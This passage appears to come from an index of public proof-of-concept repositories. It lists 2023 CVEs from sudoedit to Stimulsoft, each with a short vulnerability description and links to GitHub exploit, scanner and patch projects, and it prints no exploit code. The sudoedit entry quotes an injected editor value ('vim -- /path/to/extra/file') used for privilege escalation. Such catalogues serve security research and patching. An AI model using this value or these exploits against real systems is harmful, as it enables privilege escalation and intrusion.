In Sudo before 1.9.12p2, the sudoedit (aka -e) feature mishandles extra arguments passed in the user-provided environment variables (SUDO_EDITOR, VISUAL, and EDITOR), allowing a local attacker to append arbitrary entries to the list of files to process. This can lead to privilege escalation. Affected versions are 1.8.0 through 1.9.12.p1. The problem exists because a user-specified editor may contain a "--" argument that defeats a protection mechanism, e.g., an EDITOR='vim -- /path/to/extra/file' value.

- [n3m1sys/CVE-2023-22809-sudoedit-privesc](https://github.com/n3m1sys/CVE-2023-22809-sudoedit-privesc)
- [M4fiaB0y/CVE-2023-22809](https://github.com/M4fiaB0y/CVE-2023-22809)
- [3yujw7njai/CVE-2023-22809-sudo-POC](https://github.com/3yujw7njai/CVE-2023-22809-sudo-POC)
- [hello4r1end/patch_CVE-2023-22809](https://github.com/hello4r1end/patch_CVE-2023-22809)
- [Chan9Yan9/CVE-2023-22809](https://github.com/Chan9Yan9/CVE-2023-22809)
- [pashayogi/CVE-2023-22809](https://github.com/pashayogi/CVE-2023-22809)
- [asepsaepdin/CVE-2023-22809](https://github.com/asepsaepdin/CVE-2023-22809)
- [Toothless5143/CVE-2023-22809](https://github.com/Toothless5143/CVE-2023-22809)
- [AntiVlad/CVE-2023-22809](https://github.com/AntiVlad/CVE-2023-22809)
- [laxmiyamkolu/SUDO-privilege-escalation](https://github.com/laxmiyamkolu/SUDO-privilege-escalation)
- [D0rDa4aN919/CVE-2023-22809-Exploiter](https://github.com/D0rDa4aN919/CVE-2023-22809-Exploiter)

### CVE-2023-22855 (2023-02-15)

Kardex Mlog MCC 5.7.12+0-a203c2a213-master allows remote code execution. It spawns a web interface listening on port 8088. A user-controllable path is handed to a path-concatenation method (Path.Combine from .NET) without proper sanitisation. This yields the possibility of including local files, as well as remote files on SMB shares. If one provides a file with the extension .t4, it is rendered with the .NET templating engine mono/t4, which can execute code.

- [vianic/CVE-2023-22855](https://github.com/vianic/CVE-2023-22855)

### CVE-2023-22884 (2023-01-21)

Improper Neutralization of Special Elements used in a Command ('Command Injection') vulnerability in Apache Software Foundation Apache Airflow, Apache Software Foundation Apache Airflow MySQL Provider. This issue affects Apache Airflow: before 2.5.1; Apache Airflow MySQL Provider: before 4.0.0.

- [jakabakos/CVE-2023-22884-Airflow-SQLi](https://github.com/jakabakos/CVE-2023-22884-Airflow-SQLi)

### CVE-2023-22894 (2023-04-19)

Strapi through 4.5.5 allows attackers (with access to the admin panel) to discover sensitive user details by exploiting the query filter. The attacker can filter users by columns that contain sensitive information and infer a value from API responses. If the attacker has super admin access, then this can be exploited to discover the password hash and password reset token of all users. If the attacker has admin panel access to an account with permission to access the username and email of API users with a lower privileged role (e.g., Editor or Author), then this can be exploited to discover sensitive information for all API users but not other admin accounts.

- [Saboor-Hakimi/CVE-2023-22894](https://github.com/Saboor-Hakimi/CVE-2023-22894)

### CVE-2023-22906 (2023-07-03)

Hero Qubo HCD01_02_V1.38_20220125 devices allow TELNET access with root privileges by default, without a password.

- [nonamecoder/CVE-2023-22906](https://github.com/nonamecoder/CVE-2023-22906)

### CVE-2023-22941 (2023-02-14)

In Splunk Enterprise versions below 8.1.13, 8.2.10, and 9.0.4, an improperly-formatted ‘INGEST_EVAL’ parameter in a Field Transformation crashes the Splunk daemon (splunkd).

- [eduardosantos1989/CVE-2023-22941](https://github.com/eduardosantos1989/CVE-2023-22941)

### CVE-2023-22960 (2023-01-23)

Lexmark products through 2023-01-10 have Improper Control of Interaction Frequency.

- [t3l3machus/CVE-2023-22960](https://github.com/t3l3machus/CVE-2023-22960)

### CVE-2023-22974 (2023-02-22)

A Path Traversal in setup.php in OpenEMR < 7.0.0 allows remote unauthenticated users to read arbitrary files by controlling a connection to an attacker-controlled MySQL server.

- [gbrsh/CVE-2023-22974](https://github.com/gbrsh/CVE-2023-22974)

### CVE-2023-23138
- [OmarAtallahh/CVE-2023-23138](https://github.com/OmarAtallahh/CVE-2023-23138)

### CVE-2023-23169 (2023-05-12)

Synapsoft pdfocus 1.17 is vulnerable to local file inclusion, server-side request forgery, and directory traversal.

- [S4nshine/CVE-2023-23169](https://github.com/S4nshine/CVE-2023-23169)

### CVE-2023-23192 (2023-03-23)

IS Decisions UserLock MFA 11.01 is vulnerable to authentication bypass using a scheduled task.

- [pinarsadioglu/CVE-2023-23192](https://github.com/pinarsadioglu/CVE-2023-23192)
- [Penkyzduyi/CVE-2023-23192](https://github.com/Penkyzduyi/CVE-2023-23192)

### CVE-2023-23279 (2023-02-17)

Canteen Management System 1.0 is vulnerable to SQL Injection via /php_action/getOrderReport.php.

- [tuannq2299/CVE-2023-23279](https://github.com/tuannq2299/CVE-2023-23279)

### CVE-2023-23333 (2023-02-06)

There is a command injection vulnerability in SolarView Compact through 6.00; attackers can execute commands by bypassing internal restrictions through downloader.php.

- [Timorlover/CVE-2023-23333](https://github.com/Timorlover/CVE-2023-23333)
- [Mr-xn/CVE-2023-23333](https://github.com/Mr-xn/CVE-2023-23333)
- [emanueldosreis/nmap-CVE-2023-23333-exploit](https://github.com/emanueldosreis/nmap-CVE-2023-23333-exploit)

### CVE-2023-23388 (2023-03-14)

Windows Bluetooth Driver Elevation of Privilege Vulnerability

- [ynwarcs/CVE-2023-23388](https://github.com/ynwarcs/CVE-2023-23388)

### CVE-2023-23396 (2023-03-14)

Microsoft Excel Denial of Service Vulnerability

- [LucaBarile/CVE-2023-23396](https://github.com/LucaBarile/CVE-2023-23396)

### CVE-2023-23397 (2023-03-14)

Microsoft Outlook Elevation of Privilege Vulnerability

- [sqrtZeroKnowledge/CVE-2023-23397_EXPLOIT_0DAY](https://github.com/sqrtZeroKnowledge/CVE-2023-23397_EXPLOIT_0DAY)
- [j0eyv/CVE-2023-23397](https://github.com/j0eyv/CVE-2023-23397)
- [alicangnll/CVE-2023-23397](https://github.com/alicangnll/CVE-2023-23397)
- [grn-bogo/CVE-2023-23397](https://github.com/grn-bogo/CVE-2023-23397)
- [ka7ana/CVE-2023-23397](https://github.com/ka7ana/CVE-2023-23397)
- [api0cradle/CVE-2023-23397-POC-Powershell](https://github.com/api0cradle/CVE-2023-23397-POC-Powershell)
- [im007/CVE-2023-23397](https://github.com/im007/CVE-2023-23397)
- [cleverg0d/CVE-2023-23397-PoC-PowerShell](https://github.com/cleverg0d/CVE-2023-23397-PoC-PowerShell)
- [ahmedkhlief/CVE-2023-23397-POC](https://github.com/ahmedkhlief/CVE-2023-23397-POC)
- [BillSkiCO/CVE-2023-23397_EXPLOIT](https://github.com/BillSkiCO/CVE-2023-23397_EXPLOIT)
- [djackreuter/CVE-2023-23397-PoC](https://github.com/djackreuter/CVE-2023-23397-PoC)
- [moneertv/CVE-2023-23397](https://github.com/moneertv/CVE-2023-23397)
- [ahmedkhlief/CVE-2023-23397-POC-Using-Interop-Outlook](https://github.com/ahmedkhlief/CVE-2023-23397-POC-Using-Interop-Outlook)
- [Trackflaw/CVE-2023-23397](https://github.com/Trackflaw/CVE-2023-23397)
- [SecCTechs/CVE-2023-23397](https://github.com/SecCTechs/CVE-2023-23397)
- [tiepologian/CVE-2023-23397](https://github.com/tiepologian/CVE-2023-23397)
- [BronzeBee/cve-2023-23397](https://github.com/BronzeBee/cve-2023-23397)
- [shaolinsec/CVE-2023-23397](https://github.com/shaolinsec/CVE-2023-23397)
- [Cyb3rMaddy/CVE-2023-23397-Report](https://github.com/Cyb3rMaddy/CVE-2023-23397-Report)
- [Zeppperoni/CVE-2023-23397-Patch](https://github.com/Zeppperoni/CVE-2023-23397-Patch)
- [jacquesquail/CVE-2023-23397](https://github.com/jacquesquail/CVE-2023-23397)
- [3yujw7njai/CVE-2023-23397-POC](https://github.com/3yujw7njai/CVE-2023-23397-POC)
- [vlad-a-man/CVE-2023-23397](https://github.com/vlad-a-man/CVE-2023-23397)
- [Muhammad-Ali007/OutlookNTLM_CVE-2023-23397](https://github.com/Muhammad-Ali007/OutlookNTLM_CVE-2023-23397)
- [Pushkarup/CVE-2023-23397](https://github.com/Pushkarup/CVE-2023-23397)
- [ducnorth2712/CVE-2023-23397](https://github.com/ducnorth2712/CVE-2023-23397)
- [sarsaeroth/CVE-2023-23397-POC](https://github.com/sarsaeroth/CVE-2023-23397-POC)
- [TheUnknownSoul/CVE-2023-23397-PoW](https://github.com/TheUnknownSoul/CVE-2023-23397-PoW)
- [Symbolexe/CVE-2023-23397](https://github.com/Symbolexe/CVE-2023-23397)

### CVE-2023-23488 (2023-01-20)

The Paid Memberships Pro WordPress Plugin, version < 2.9.8, is affected by an unauthenticated SQL injection vulnerability in the 'code' parameter of the '/pmpro/v1/order' REST route.

- [long-rookie/CVE-2023-23488-PoC](https://github.com/long-rookie/CVE-2023-23488-PoC)
- [cybfar/CVE-2023-23488-pmpro-2.8](https://github.com/cybfar/CVE-2023-23488-pmpro-2.8)

### CVE-2023-23531 (2023-02-27)

The issue was addressed with improved memory handling. This issue is fixed in macOS Ventura 13.2, iOS 16.3 and iPadOS 16.3. An app may be able to execute arbitrary code out of its sandbox or with certain elevated privileges.

- [DarthOCE/MonkeyJB](https://github.com/DarthOCE/MonkeyJB)

### CVE-2023-23583 (2023-11-14)

A sequence of processor instructions that leads to unexpected behavior on some Intel(R) Processors may allow an authenticated user to potentially enable escalation of privilege and/or information disclosure and/or denial of service via local access.

- [Mav3r1ck0x1/CVE-2023-23583-Reptar-](https://github.com/Mav3r1ck0x1/CVE-2023-23583-Reptar-)

### CVE-2023-23607 (2023-01-20)

erohtar/Dasherr is a dashboard for self-hosted services. In affected versions unrestricted file upload allows any unauthenticated user to execute arbitrary code on the server. The file /www/include/filesave.php allows any file to be uploaded to anywhere. If an attacker uploads a PHP file they can execute code on the server. This issue has been addressed in version 1.05.00. Users are advised to upgrade. There are no known workarounds for this issue.

- [Pylonet/CVE-2023-23607](https://github.com/Pylonet/CVE-2023-23607)

### CVE-2023-23638 (2023-03-08)

A deserialization vulnerability existed in Dubbo generic invoke, which could lead to malicious code execution.

This issue affects Apache Dubbo 2.7.x version 2.7.21 and prior versions; Apache Dubbo 3.0.x version 3.0.13 and prior versions; Apache Dubbo 3.1.x version 3.1.5 and prior versions.

- [X1r0z/Dubbo-RCE](https://github.com/X1r0z/Dubbo-RCE)
- [YYHYlh/Apache-Dubbo-CVE-2023-23638-exp](https://github.com/YYHYlh/Apache-Dubbo-CVE-2023-23638-exp)
- [3yujw7njai/CVE-2023-23638-Tools](https://github.com/3yujw7njai/CVE-2023-23638-Tools)

### CVE-2023-23752 (2023-02-16)

An issue was discovered in Joomla! 4.0.0 through 4.2.7. An improper access check allows unauthorized access to webservice endpoints.

- [yusinomy/CVE-2023-23752](https://github.com/yusinomy/CVE-2023-23752)
- [Saboor-Hakimi/CVE-2023-23752](https://github.com/Saboor-Hakimi/CVE-2023-23752)
- [Vulnmachines/joomla_CVE-2023-23752](https://github.com/Vulnmachines/joomla_CVE-2023-23752)
- [sw0rd1ight/CVE-2023-23752](https://github.com/sw0rd1ight/CVE-2023-23752)
- [wangking1/CVE-2023-23752-poc](https://github.com/wangking1/CVE-2023-23752-poc)
- [ibaiw/joomla_CVE-2023-23752](https://github.com/ibaiw/joomla_CVE-2023-23752)
- [ifacker/CVE-2023-23752-Joomla](https://github.com/ifacker/CVE-2023-23752-Joomla)
- [z3n70/CVE-2023-23752](https://github.com/z3n70/CVE-2023-23752)
- [keyuan15/CVE-2023-23752](https://github.com/keyuan15/CVE-2023-23752)
- [adriyansyah-mf/CVE-2023-23752](https://github.com/adriyansyah-mf/CVE-2023-23752)
- [GhostToKnow/CVE-2023-23752](https://github.com/GhostToKnow/CVE-2023-23752)
- [gibran-abdillah/CVE-2023-23752](https://github.com/gibran-abdillah/CVE-2023-23752)
- [Jenderal92/Joomla-CVE-2023-23752](https://github.com/Jenderal92/Joomla-CVE-2023-23752)
- [Acceis/exploit-CVE-2023-23752](https://github.com/Acceis/exploit-CVE-2023-23752)
- [karthikuj/CVE-2023-23752-Docker](https://github.com/karthikuj/CVE-2023-23752-Docker)
- [0xNahim/CVE-2023-23752](https://github.com/0xNahim/CVE-2023-23752)
- [adhikara13/CVE-2023-23752](https://github.com/adhikara13/CVE-2023-23752)
- [AkbarWiraN/Joomla-Scanner](https://github.com/AkbarWiraN/Joomla-Scanner)
- [Ge-Per/Scanner-CVE-2023-23752](https://github.com/Ge-Per/Scanner-CVE-2023-23752)
- [ThatNotEasy/CVE-2023-23752](https://github.com/ThatNotEasy/CVE-2023-23752)
- [wibuheker/Joomla-CVE-2023-23752](https://github.com/wibuheker/Joomla-CVE-2023-23752)
- [Sweelg/CVE-2023-23752](https://github.com/Sweelg/CVE-2023-23752)
- [MrP4nda1337/CVE-2023-23752](https://github.com/MrP4nda1337/CVE-2023-23752)
- [lainonz/CVE-2023-23752](https://github.com/lainonz/CVE-2023-23752)
- [yTxZx/CVE-2023-23752](https://github.com/yTxZx/CVE-2023-23752)
- [AlissonFaoli/CVE-2023-23752](https://github.com/AlissonFaoli/CVE-2023-23752)
- [Pushkarup/CVE-2023-23752](https://github.com/Pushkarup/CVE-2023-23752)
- [blacks1ph0n/CVE-2023-23752](https://github.com/blacks1ph0n/CVE-2023-23752)
- [Youns92/Joomla-v4.2.8---CVE-2023-23752](https://github.com/Youns92/Joomla-v4.2.8---CVE-2023-23752)
- [Ly0kha/Joomla-CVE-2023-23752-Exploit-Script](https://github.com/Ly0kha/Joomla-CVE-2023-23752-Exploit-Script)
- [r3dston3/CVE-2023-23752](https://github.com/r3dston3/CVE-2023-23752)
- [svaltheim/CVE-2023-23752](https://github.com/svaltheim/CVE-2023-23752)
- [Fernando-olv/Joomla-CVE-2023-23752](https://github.com/Fernando-olv/Joomla-CVE-2023-23752)
- [K3ysTr0K3R/CVE-2023-23752-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2023-23752-EXPLOIT)
- [hadrian3689/CVE-2023-23752_Joomla](https://github.com/hadrian3689/CVE-2023-23752_Joomla)
- [C1ph3rX13/CVE-2023-23752](https://github.com/C1ph3rX13/CVE-2023-23752)
- [JeneralMotors/CVE-2023-23752](https://github.com/JeneralMotors/CVE-2023-23752)
- [gunzf0x/CVE-2023-23752](https://github.com/gunzf0x/CVE-2023-23752)
- [TindalyTn/CVE-2023-23752](https://github.com/TindalyTn/CVE-2023-23752)
- [shellvik/CVE-2023-23752](https://github.com/shellvik/CVE-2023-23752)
- [Rival420/CVE-2023-23752](https://github.com/Rival420/CVE-2023-23752)
- [JohnDoeAnonITA/CVE-2023-23752](https://github.com/JohnDoeAnonITA/CVE-2023-23752)
- [0xWhoami35/CVE-2023-23752](https://github.com/0xWhoami35/CVE-2023-23752)
- [mariovata/CVE-2023-23752-Python](https://github.com/mariovata/CVE-2023-23752-Python)
- [0xx01/CVE-2023-23752](https://github.com/0xx01/CVE-2023-23752)
- [h3xcr4ck3r/CVE-2023-23752](https://github.com/h3xcr4ck3r/CVE-2023-23752)
- [mil4ne/CVE-2023-23752-Joomla-v4.2.8](https://github.com/mil4ne/CVE-2023-23752-Joomla-v4.2.8)
- [Aureum01/CVE-2023-23752](https://github.com/Aureum01/CVE-2023-23752)

### CVE-2023-23924 (2023-01-31)

Dompdf is an HTML to PDF converter. The URI validation on dompdf 2.0.1 can be bypassed on SVG parsing by passing `<image>` tags with uppercase letters. This may lead to arbitrary object unserialize on PHP < 8, through the `phar` URL wrapper. An attacker can exploit the vulnerability to call an arbitrary URL with arbitrary protocols, if they can provide an SVG file to dompdf. In PHP versions before 8.0.0, it leads to arbitrary unserialize, which will lead, at the very least, to an arbitrary file deletion and even remote code execution, depending on classes that are available.

- [motikan2010/CVE-2023-23924](https://github.com/motikan2010/CVE-2023-23924)

### CVE-2023-23946 (2023-02-14)

Git, a revision control system, is vulnerable to path traversal prior to versions 2.39.2, 2.38.4, 2.37.6, 2.36.5, 2.35.7, 2.34.7, 2.33.7, 2.32.6, 2.31.7, and 2.30.8. By feeding a crafted input to `git apply`, a path outside the working tree can be overwritten as the user who is running `git apply`. A fix has been prepared and will appear in v2.39.2, v2.38.4, v2.37.6, v2.36.5, v2.35.7, v2.34.7, v2.33.7, v2.32.6, v2.31.7, and v2.30.8. As a workaround, use `git apply --stat` to inspect a patch before applying; avoid applying one that creates a symbolic link and then creates a file beyond the symbolic link.

- [bruno-1337/CVE-2023-23946-POC](https://github.com/bruno-1337/CVE-2023-23946-POC)

### CVE-2023-24044 (2023-01-22)

A Host Header Injection issue on the Login page of Plesk Obsidian through 18.0.49 allows attackers to redirect users to malicious websites via a Host request header. NOTE: the vendor's position is "the ability to use arbitrary domain names to access the panel is an intended feature."

- [Cappricio-Securities/CVE-2023-24044](https://github.com/Cappricio-Securities/CVE-2023-24044)

### CVE-2023-24055 (2023-01-22)

KeePass through 2.53 (in a default installation) allows an attacker, who has write access to the XML configuration file, to obtain the cleartext passwords by adding an export trigger. NOTE: the vendor's position is that the password database is not intended to be secure against an attacker who has that level of access to the local PC.

- [deetl/CVE-2023-24055](https://github.com/deetl/CVE-2023-24055)
- [alt3kx/CVE-2023-24055_PoC](https://github.com/alt3kx/CVE-2023-24055_PoC)
- [Cyb3rtus/keepass_CVE-2023-24055_yara_rule](https://github.com/Cyb3rtus/keepass_CVE-2023-24055_yara_rule)
- [duckbillsecurity/CVE-2023-24055](https://github.com/duckbillsecurity/CVE-2023-24055)
- [julesbozouklian/PoC_CVE-2023-24055](https://github.com/julesbozouklian/PoC_CVE-2023-24055)
- [digital-dev/KeePass-TriggerLess](https://github.com/digital-dev/KeePass-TriggerLess)
- [zwlsix/KeePass-CVE-2023-24055](https://github.com/zwlsix/KeePass-CVE-2023-24055)

### CVE-2023-24059 (2023-01-22)

Grand Theft Auto V for PC allows attackers to achieve partial remote code execution or modify files on a PC, as exploited in the wild in January 2023.

- [gmh5225/CVE-2023-24059](https://github.com/gmh5225/CVE-2023-24059)

### CVE-2023-24078 (2023-02-17)

Real Time Logic FuguHub v8.1 and earlier was discovered to contain a remote code execution (RCE) vulnerability via the component /FuguHub/cmsdocs/.

- [overgrowncarrot1/CVE-2023-24078](https://github.com/overgrowncarrot1/CVE-2023-24078)
- [rio128128/CVE-2023-24078](https://github.com/rio128128/CVE-2023-24078)
- [ag-rodriguez/CVE-2023-24078](https://github.com/ag-rodriguez/CVE-2023-24078)

### CVE-2023-24100
- [badboycxcc/CVE-2023-24100](https://github.com/badboycxcc/CVE-2023-24100)

### CVE-2023-24203 (-)

Cross Site Scripting vulnerability in SourceCodester Simple Customer Relationship Management System v1.0 allows an attacker to execute arbitrary code via the company or query parameter(s).

- [momo1239/CVE-2023-24203-and-CVE-2023-24204](https://github.com/momo1239/CVE-2023-24203-and-CVE-2023-24204)

### CVE-2023-24249 (2023-02-27)

An arbitrary file upload vulnerability in laravel-admin v1.8.19 allows attackers to execute arbitrary code via a crafted PHP file.

- [IDUZZEL/CVE-2023-24249-Exploit](https://github.com/IDUZZEL/CVE-2023-24249-Exploit)

### CVE-2023-24317 (2023-02-23)

Judging Management System 1.0 was discovered to contain an arbitrary file upload vulnerability via the component edit_organizer.php.

- [angelopioamirante/CVE-2023-24317](https://github.com/angelopioamirante/CVE-2023-24317)

### CVE-2023-24329 (2023-02-17)

An issue in the urllib.parse component of Python before 3.11.4 allows attackers to bypass blocklisting methods by supplying a URL that starts with blank characters.

- [H4R335HR/CVE-2023-24329-PoC](https://github.com/H4R335HR/CVE-2023-24329-PoC)
- [Pandante-Central/CVE-2023-24329-codeql-test](https://github.com/Pandante-Central/CVE-2023-24329-codeql-test)
- [PenTestMano/CVE-2023-24329-Exploit](https://github.com/PenTestMano/CVE-2023-24329-Exploit)

### CVE-2023-24488 (2023-07-10)

Cross site scripting vulnerability in Citrix ADC and Citrix Gateway allows an attacker to perform cross site scripting.

- [SirBugs/CVE-2023-24488-PoC](https://github.com/SirBugs/CVE-2023-24488-PoC)
- [Abo5/CVE-2023-24488](https://github.com/Abo5/CVE-2023-24488)
- [securitycipher/CVE-2023-24488](https://github.com/securitycipher/CVE-2023-24488)
- [NSTCyber/CVE-2023-24488-SIEM-Sigma-Rule](https://github.com/NSTCyber/CVE-2023-24488-SIEM-Sigma-Rule)
- [raytheon0x21/CVE-2023-24488](https://github.com/raytheon0x21/CVE-2023-24488)

### CVE-2023-24489 (2023-07-10)

A vulnerability has been discovered in the customer-managed ShareFile storage zones controller which, if exploited, could allow an unauthenticated attacker to remotely compromise the customer-managed ShareFile storage zones controller.

- [adhikara13/CVE-2023-24489-ShareFile](https://github.com/adhikara13/CVE-2023-24489-ShareFile)
- [whalebone7/CVE-2023-24489-poc](https://github.com/whalebone7/CVE-2023-24489-poc)

### CVE-2023-24517 (2023-08-22)

Unrestricted Upload of File with Dangerous Type vulnerability in the Pandora FMS File Manager component allows an attacker to make use of this issue (unrestricted file upload) to execute arbitrary system commands. This issue affects Pandora FMS v767 version and prior versions on all platforms.

- [Argonx21/CVE-2023-24517](https://github.com/Argonx21/CVE-2023-24517)

### CVE-2023-24538 (2023-04-06)

Templates do not properly consider backticks (`) as Javascript string delimiters, and do not escape them as expected. Backticks are used, since ES6, for JS template literals. If a template contains a Go template action within a Javascript template literal, the contents of the action can be used to terminate the literal, injecting arbitrary Javascript code into the Go template. As ES6 template literals are rather complex, and themselves can do string interpolation, the decision was made to simply disallow Go template actions from being used inside of them (e.g. "var a = {{.}}"), since there is no obviously safe way to allow this behavior. This takes the same approach as github.com/google/safehtml. With fix, Template.Parse returns an Error when it encounters templates like this, with an ErrorCode of value 12. This ErrorCode is currently unexported, but will be exported in the release of Go 1.21. Users who rely on the previous behavior can re-enable it using the GODEBUG flag jstmpllitinterp=1, with the caveat that backticks will now be escaped. This should be used with caution.

- [skulkarni-mv/goIssue_dunfell](https://github.com/skulkarni-mv/goIssue_dunfell)
- [skulkarni-mv/goIssue_kirkstone](https://github.com/skulkarni-mv/goIssue_kirkstone)

### CVE-2023-24610 (2023-02-01)

NOSH 4a5cfdb allows remote authenticated users to execute PHP arbitrary code via the "practice logo" upload feature. The client-side checks can be bypassed. This may allow attackers to steal Protected Health Information because the product is for health charting.

- [abbisQQ/CVE-2023-24610](https://github.com/abbisQQ/CVE-2023-24610)

### CVE-2023-24706
- [hatjwe/CVE-2023-24706](https://github.com/hatjwe/CVE-2023-24706)

### CVE-2023-24709 (2023-03-21)

An issue found in Paradox Security Systems IPR512 allows attackers to cause a denial of service via the login.html and login.xml parameters.

- [DRAGOWN/Injection-vulnerability-in-Paradox-Security-Systems-IPR512-CVE-2023-24709-PoC](https://github.com/DRAGOWN/Injection-vulnerability-in-Paradox-Security-Systems-IPR512-CVE-2023-24709-PoC)

### CVE-2023-24749
- [mahaloz/netgear-pwnagent](https://github.com/mahaloz/netgear-pwnagent)

### CVE-2023-24775 (2023-03-07)

Funadmin v3.2.0 was discovered to contain a SQL injection vulnerability via the selectFields parameter at \member\Member.php.

- [csffs/CVE-2023-24775-and-CVE-2023-24780](https://github.com/csffs/CVE-2023-24775-and-CVE-2023-24780)

### CVE-2023-24871 (2023-03-14)

Windows Bluetooth Service Remote Code Execution Vulnerability

- [ynwarcs/CVE-2023-24871](https://github.com/ynwarcs/CVE-2023-24871)

### CVE-2023-24955 (2023-05-09)

Microsoft SharePoint Server Remote Code Execution Vulnerability

- [former-farmer/CVE-2023-24955-PoC](https://github.com/former-farmer/CVE-2023-24955-PoC)

### CVE-2023-24998 (2023-02-20)

Apache Commons FileUpload before 1.5 does not limit the number of request parts to be processed, resulting in the possibility of an attacker triggering a DoS with a malicious upload or series of uploads.

Note that, like all of the file upload limits, the new configuration option (FileUploadBase#setFileCountMax) is not enabled by default and must be explicitly configured.

- [nice1st/CVE-2023-24998](https://github.com/nice1st/CVE-2023-24998)

### CVE-2023-25136 (2023-02-03)

OpenSSH server (sshd) 9.1 introduced a double-free vulnerability during options.kex_algorithms handling. This is fixed in OpenSSH 9.2. The double free can be leveraged, by an unauthenticated remote attacker in the default configuration, to jump to any location in the sshd address space. One third-party report states "remote code execution is theoretically possible."

- [jfrog/jfrog-CVE-2023-25136-OpenSSH_Double-Free](https://github.com/jfrog/jfrog-CVE-2023-25136-OpenSSH_Double-Free)
- [ticofookfook/CVE-2023-25136](https://github.com/ticofookfook/CVE-2023-25136)
- [Christbowel/CVE-2023-25136](https://github.com/Christbowel/CVE-2023-25136)
- [adhikara13/CVE-2023-25136](https://github.com/adhikara13/CVE-2023-25136)
- [nhakobyan685/CVE-2023-25136](https://github.com/nhakobyan685/CVE-2023-25136)
- [axylisdead/CVE-2023-25136_POC](https://github.com/axylisdead/CVE-2023-25136_POC)
- [H4K6/CVE-2023-25136](https://github.com/H4K6/CVE-2023-25136)
- [Business1sg00d/CVE-2023-25136](https://github.com/Business1sg00d/CVE-2023-25136)
- [malvika-thakur/CVE-2023-25136](https://github.com/malvika-thakur/CVE-2023-25136)

### CVE-2023-25157 (2023-02-21)

GeoServer is an open source software server written in Java that allows users to share and edit geospatial data. GeoServer includes support for the OGC Filter expression language and the OGC Common Query Language (CQL) as part of the Web Feature Service (WFS) and Web Map Service (WMS) protocols. CQL is also supported through the Web Coverage Service (WCS) protocol for ImageMosaic coverages. Users are advised to upgrade to either version 2.21.4, or version 2.22.2 to resolve this issue. Users unable to upgrade should disable the PostGIS Datastore *encode functions* setting to mitigate ``strEndsWith``, ``strStartsWith`` and ``PropertyIsLike`` misuse and enable the PostGIS DataStore *preparedStatements* setting to mitigate the ``FeatureId`` misuse.

- [win3zz/CVE-2023-25157](https://github.com/win3zz/CVE-2023-25157)
- [0x2458bughunt/CVE-2023-25157](https://github.com/0x2458bughunt/CVE-2023-25157)
- [murataydemir/CVE-2023-25157-and-CVE-2023-25158](https://github.com/murataydemir/CVE-2023-25157-and-CVE-2023-25158)
- [7imbitz/CVE-2023-25157-checker](https://github.com/7imbitz/CVE-2023-25157-checker)
- [Rubikcuv5/CVE-2023-25157](https://github.com/Rubikcuv5/CVE-2023-25157)
- [dr-cable-tv/Geoserver-CVE-2023-25157](https://github.com/dr-cable-tv/Geoserver-CVE-2023-25157)

### CVE-2023-25194 (2023-02-07)

A possible security vulnerability has been identified in Apache Kafka Connect API. This requires access to a Kafka Connect worker, and the ability to create/modify connectors on it with an arbitrary Kafka client SASL JAAS config and a SASL-based security protocol, which has been possible on Kafka Connect clusters since Apache Kafka Connect 2.3.0. When configuring the connector via the Kafka Connect REST API, an authenticated operator can set the `sasl.jaas.config` property for any of the connector's Kafka clients to "com.sun.security.auth.module.JndiLoginModule", which can be done via the `producer.override.sasl.jaas.config`, `consumer.override.sasl.jaas.config`, or `admin.override.sasl.jaas.config` properties. This will allow the server to connect to the attacker's LDAP server and deserialize the LDAP response, which the attacker can use to execute Java deserialization gadget chains on the Kafka Connect server. An attacker can cause unrestricted deserialization of untrusted data (or) RCE vulnerability when there are gadgets in the classpath.

Since Apache Kafka 3.0.0, users are allowed to specify these properties in connector configurations for Kafka Connect clusters running with out-of-the-box configurations. Before Apache Kafka 3.0.0, users may not specify these properties unless the Kafka Connect cluster has been reconfigured with a connector client override policy that permits them.

Since Apache Kafka 3.4.0, we have added a system property ("-Dorg.apache.kafka.disallowed.login.modules") to disable the problematic login modules usage in SASL JAAS configuration. Also by default "com.sun.security.auth.module.JndiLoginModule" is disabled in Apache Kafka Connect 3.4.0.

We advise the Kafka Connect users to validate connector configurations and only allow trusted JNDI configurations. Also examine connector dependencies for vulnerable versions and either upgrade their connectors, upgrade that specific dependency, or remove the connectors as options for remediation. Finally, in addition to leveraging the "org.apache.kafka.disallowed.login.modules" system property, Kafka Connect users can also implement their own connector client config override policy, which can be used to control which Kafka client properties can be overridden directly in a connector config and which cannot.

- [ohnonoyesyes/CVE-2023-25194](https://github.com/ohnonoyesyes/CVE-2023-25194)
- [YongYe-Security/CVE-2023-25194](https://github.com/YongYe-Security/CVE-2023-25194)
- [vulncheck-oss/cve-2023-25194](https://github.com/vulncheck-oss/cve-2023-25194)

### CVE-2023-25202
- [Trackflaw/CVE-2023-25202](https://github.com/Trackflaw/CVE-2023-25202)

### CVE-2023-25203
- [Trackflaw/CVE-2023-25203](https://github.com/Trackflaw/CVE-2023-25203)

### CVE-2023-25234 (2023-02-27)

Tenda AC500 V2.0.1.9(1307) is vulnerable to Buffer Overflow in function fromAddressNat via parameters entrys and mitInterface.

- [FzBacon/CVE-2023-25234_Tenda_AC6_stack_overflow](https://github.com/FzBacon/CVE-2023-25234_Tenda_AC6_stack_overflow)

### CVE-2023-25260 (2023-03-28)

Stimulsoft Designer (Web) 2023.1.3 is vulnerable to Local File Inclusion.

- [trustcves/CVE-2023-25260](https://github.com/trustcves/CVE-2023-25260)

### CVE-2023-25261 (2023-03-27)

Certain Stimulsoft GmbH products are affected by: Remote Code Execution. This affects Stimulsoft Designer (Desktop) 2023.1.4 and Stimulsoft Designer (Web) 2023.1.3 and Stimulsoft Viewer (Web) 2023.1.3. Access to the local file system is not prohibited in any way. Therefore, an attacker may include source code which reads or writes local directories and files. It is also possible for the attacker to prepare a report which has a variable that holds the gathered data and render it in the report.

- [trustcves/CVE-2023-25261](https://github.com/trustcves/CVE-2023-25261)

### CVE-2023-25262 (2023-03-28)

Stimulsoft GmbH Stimulsoft Designer (Web) 2023.1.3 is vulnerable to Server Side Request Forgery (SSRF). The Reporting Designer (Web) offers the possibility to embed sources from external locations. If the user chooses an external location, the request to that resource is performed by the server rather than the client. Therefore, the server causes outbound traffic and potentially imports data. An attacker may also leverage this behaviour to exfiltrate data of machines on the internal network of the server hosting the Stimulsoft Reporting Designer (Web).

- [trustcves/CVE-2023-25262](https://github.com/trustcves/CVE-2023-25262)

### CVE-2023-25263 (2023-03-27)

